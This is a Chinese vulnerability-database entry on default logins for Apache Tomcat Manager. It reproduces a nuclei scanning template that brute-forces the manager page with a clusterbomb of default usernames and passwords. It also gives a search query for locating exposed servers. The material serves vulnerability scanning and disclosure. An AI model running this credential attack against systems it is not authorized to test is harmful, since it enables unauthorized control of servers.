漏洞信息
漏洞名称: Apache Tomcat Manager Default Login
漏洞类型: 弱口令
漏洞等级: 高危
漏洞描述: Apache Tomcat是一个广泛使用的开源Web服务器和Servlet容器,常用于部署Java应用程序。它支持多种企业级功能,是许多网站和在线服务的核心组件。Tomcat Manager是Tomcat的一个管理界面,允许管理员通过Web界面部署、管理和监控应用程序。
该漏洞涉及Tomcat Manager的默认登录凭证问题。攻击者可以利用这些默认凭证(如admin/admin、tomcat/tomcat等)尝试登录管理界面。由于许多管理员在部署后未更改这些默认凭证,导致系统面临未授权访问的风险。这种弱口令问题源于系统部署时的配置疏忽,未能遵循安全最佳实践。
成功利用此漏洞的攻击者可以完全控制Tomcat服务器,包括部署恶意应用程序、访问敏感数据、甚至执行服务器端代码。这不仅会导致数据泄露,还可能被用来发起进一步的攻击,如网站篡改或作为攻击内网的跳板。由于攻击无需复杂技术,且可以自动化进行,因此威胁等级较高。
产品厂商: apache
产品名称: tomcat
影响版本: *
搜索语法: title:”Apache Tomcat”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fdefault-logins%2Fapache%2Ftomcat-default-login.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102
| id: tomcat-default-login
info: name: Apache Tomcat Manager Default Login author: pdteam,sinKettu,nybble04 severity: high description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. reference: - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/ - https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt classification: cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 405 vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" tags: tomcat,apache,default-login
http: - raw: - | GET /manager/html HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}}
payloads: username: - ADMIN - QCC - admin - both - cxsdk - demo - j2deployer - manager - ovwebusr - role - role1 - root - server_admin - tomcat - xampp password: - ADMIN - OvW*busr1 - Password1 - QLogic66 - admanager - admin - adrole1 - adroot - ads3cret - adtomcat - advagrant - changethis - demo - j2deployer - kdsxc - manager - owaspbwa - password - password1 - r00t - role1 - root - s3cret - tomcat - toor - vagrant - xampp attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb threads: 30
matchers-condition: and matchers: - type: word part: body words: - "Apache Tomcat" - "Server Information" condition: and
- type: word part: body words: - "Tomcat Version" - "JVM Version" - "JVM Vendor" - "OS Name" - "OS Version" - "OS Architecture" - "Hostname" - "IP Address" condition: or
- type: status status: - 200
|